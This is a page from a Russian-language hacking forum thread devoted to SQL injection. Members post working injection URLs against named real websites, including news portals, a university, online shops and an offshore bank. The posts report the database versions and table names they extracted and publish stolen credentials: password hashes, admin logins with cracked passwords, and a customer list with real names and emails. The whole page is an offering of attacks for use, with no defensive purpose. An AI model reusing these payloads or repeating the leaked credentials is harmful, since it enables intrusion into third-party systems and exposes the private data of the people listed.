HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 897 из 1604 « Первая < 397797847887 893 894 895 896 897 898 899 900 901 9079479971397 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #8961  
Старый 22.04.2009, 00:13
fker
Участник форума
Регистрация: 26.11.2008
Сообщений: 158
С нами: 9187097

Репутация: 158
По умолчанию
Театральные новые известия(pr6)
Код:
http://teatr.newizv.ru/news/?IDNews=-1+union+select+1,database(),table_name,4,5,6,7,8,9,11,12--&date=2008-07-01
user() - u10605@10.10.12.75
database() - u10605
version() - 5.0.45-log
База данных одна с главным доменом newizv.ru (тиц-12к pr-7)
Интересные таблы
Код:
ReklamaUsers
rgn_users
users
users_
prupal_access
еще есть форум и должна быть неплохая база подписчиков
 
Ответить с цитированием

  #8962  
Старый 22.04.2009, 09:35
edichka
Новичок
Регистрация: 31.01.2009
Сообщений: 22
С нами: 9092536

Репутация: 34
По умолчанию
math.ecnu.edu.cn pr 6
Код:
http://math.ecnu.edu.cn/~hkliu/intro.html?id=-23%20union%20select%201,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4--

5.0.45:faculty:root@localhost

http://math.ecnu.edu.cn/~hkliu/intro.html?id=-23%20union%20select%201,file_priv,concat(user,0x3a,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4%20from%20mysql.user--

root:07ffadcc61d6408b file_priv - Y
 
Ответить с цитированием

  #8963  
Старый 22.04.2009, 11:32
lalala23
Новичок
Регистрация: 14.03.2009
Сообщений: 4
С нами: 9031875

Репутация: 6
По умолчанию
Цитата:
http://www.konsalting.tv/content.php?r=-29+union+select+1,concat(version(),0x3a,user(),0x3 a,database()),3%20--
4.0.26-log:Uwww3947S@localhost:udb3947

Цитата:
http://www.antgroup.kz/eng/index.php?p=-1+union+select+1,concat(version(),0x3a,database(), 0x3a,user()),3,4,5,6,7%20--
4.1.25:antbase_eng:antbase@localhost
Последний раз редактировалось lalala23; 22.04.2009 в 13:30..
 
Ответить с цитированием

  #8964  
Старый 22.04.2009, 14:54
BHYCHIK
Познающий
Регистрация: 30.01.2009
Сообщений: 64
С нами: 9093390

Репутация: 94
По умолчанию
Скуля на www.relaytoday.com

Уязвимый скрипт(9 полей)
http://www.relaytoday.com/admin/previewnewsletter.php?ID=2

Список всех таблиц базы данных.
http://www.relaytoday.com/admin/previewnewsletter.php?ID=-2+union+select+1,2,table_name,4,5,6,7,8,9+from+inf ormation_schema.tables+--+

Список полей таблицы users
http://www.relaytoday.com/admin/previewnewsletter.php?ID=-2+union+select+1,2,column_name,4,5,6,7,8,9+from+in formation_schema.columns+where+table_name=0x757365 7273+--+

Логин/пароль
http://www.relaytoday.com/admin/previewnewsletter.php?ID=-2+union+select+1,2,concat_ws(0x3a,username,passwor d,admin),4,5,6,7,8,9+from+users+--+

Сводка по системе
Версия БД: 5.0.67-log
пользователь: wkhorse_1@localhost
Имя базы данных: wkhorse_relaytoday
ОС: apple-darwin9.0
Папка мускула: /var/mysql/

Админка
http://www.relaytoday.com/admin/

Доступа к mysql.user нет. Прав на чтение файла нет.
 
Ответить с цитированием

  #8965  
Старый 22.04.2009, 15:56
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
С нами: 9035873

Репутация: 317
По умолчанию
<<Антивирусная школа - Новый источник IT знаний>> (:
Код:
http://av-school.ru/index.php?dn=blogs&to=comment&id=9999'+Union+sElecT+concat_ws(0x2a3a2a,%27%22%3E%3Ch1%3E%27,version(),database(),user(),@@version_compile_os)--+&mp
*:*5.1.11-beta*:*kav_system*:*kavsystem@localhost*:*portbld-freebsd6.2"
--------
Powered By Danneo RCMS
 
Ответить с цитированием

  #8966  
Старый 22.04.2009, 17:33
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами: 9288132

Репутация: 571
По умолчанию
Код:
http://www.silumin.kz/index.php?m=-259+union+select+1,2,3,version(),5,6,7,8--
Код:
http://www.football-plus.az/view_cat.php?cat=2'+and+substring(version(),1,1)=4--+
 
Ответить с цитированием

  #8967  
Старый 22.04.2009, 21:57
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами: 9362947

Репутация: 1196


По умолчанию
www.impact.org
Код:
http://www.impact.org/speakerprofile.php?id=-76+union+select+1,2,3,4,5,6,7,8--
version():5.0.67-community
user():impact_site@localhost
database():impact_devsite
 
Ответить с цитированием

  #8968  
Старый 22.04.2009, 22:44
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
С нами: 9837719

Репутация: 466
По умолчанию
http://www.dndrocketry.us/pages.php?id=6/**/UNION/**/SELECT/**/1,2,3/**/LIMIT/**/1,1/*

Database Version: 4.1.22-standard
Database name: dndrock_store
User name: dndrock_dnd@localhost

http://www.warrenfarrell.com/pages.php?id=-52/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/*

Database Version: 4.0.25
Database name: warren
User name: warren@localhost

http://www.buenachamba.com/pages.php?id=-20%27+union+select+1,user()/*

Database Version: 5.0.22
Database name: edemodb02
User name: edemouser02@localhost

pass к adminarea
mysql хеш:5f02164e65082b3e
Последний раз редактировалось Rubaka; 22.04.2009 в 23:57.. Причина: +
 
Ответить с цитированием

  #8969  
Старый 23.04.2009, 00:13
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами: 9100556

Репутация: 912
По умолчанию
Цитата:
http://www.ideaborn.com/detalle.php?id=-112+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
Database Version: 5.0.67-userstats-log
Database name: ideaborn_db
User name: ideaborn@ned.dreamhost.com

Login: admin
Pass: 81dc9bdb52d04dc20036dbd8313ed055 : 1234


Цитата:
http://jobgorod.ru/comment.php?ID=1-1+union+select+1,2,3,4,5--
Database Version: 4.1.22-log
Database name: jobgoro9_pokebase
User name: jobgoro9_@localhost

email: pass
http://jobgorod.ru/comment.php?ID=1-1+union+select+1,2,3,pass,concat_ws(0x3a,email)+fr om+users--


Цитата:
http://www.tvlab.com.ua/news/?id=-1+union+select+1,2,3,4--
Database Version: 5.0.51a
Database name: tvlab
User name: root@localhost


Шоп Багаж

Цитата:
http://bagazh-club.com.ua/index.php?m=06&id=-1+union+select+1,2,3,4,5,6--
Database Version: 5.0.51a-15-log
Database name: bagazhclub
User name: u_bagazhclub@localhost


Админка:

http://bagazh-club.com.ua/admin/

name: email: pswd

test:test@test.com:3213213213
test02:test02@mail.ru:2155456745
Иван Помидоров:ja-in-da-house@yandex.ru:654654654654
Федор Двинятин:test@mail.ru:384188998461
Сапармурат Ниязов:test@intechcentr.net:384188998461
123:ajegulsky@aaa.com:444586395834
Федор Иванов:abc@mail.ru:392703942157
Бла Бла:bla@mail.ru:271963550274
Людмила:mvadim@pisem.net:728109118270
Вадим:mvc@pur.ru:199490154267
Дмитрий:dimitriy_7@mail.ru:532843683176
Павел:arn_k@fromru.com:886098478852
Никита:nik-13-92@mail.ru:660344924172
Алла:allsolla@mail.ru:999999992222
Олег:Lichne@gmail.com:100509603544
алексей:alex_dem2008@mail.ru:335210418217
Инна:tebochka@ukr.net:614732119521
Последний раз редактировалось .:[melkiy]:.; 23.04.2009 в 00:31..
 
Ответить с цитированием

  #8970  
Старый 23.04.2009, 04:48
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами: 10024314

Репутация: 739
По умолчанию
Offshore Banking|NCB Cayman Limited
Microsoft Access
Цитата:
http://ncbcayman.com/services.asp?service=1+union+select+1,2,3,4,5,6,7, 8,9,10,11+from+news
Доступа к MSysObjects как и к другим системным таблицам нету.Стоит админка,но её таблицу юзеров не подобрал.


Какой-то сайт граффити
Цитата:
http://workground.net/news9112008'+and+ascii(substring(user(),1,1))=109+--+.html
ИТД
->user() = master@localhost
Цитата:
http://workground.net/news9112008'+and+ascii(substring((select+1+from+ad min),1,1))=49+--+.html
таблица admin колонки login,pdw
в итоге
Код:
admin:enter2work
Админка:
Цитата:
http://workground.net/admin/
 
Ответить с цитированием
Ответ
Страница 897 из 1604 « Первая < 397797847887 893 894 895 896 897 898 899 900 901 9079479971397 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.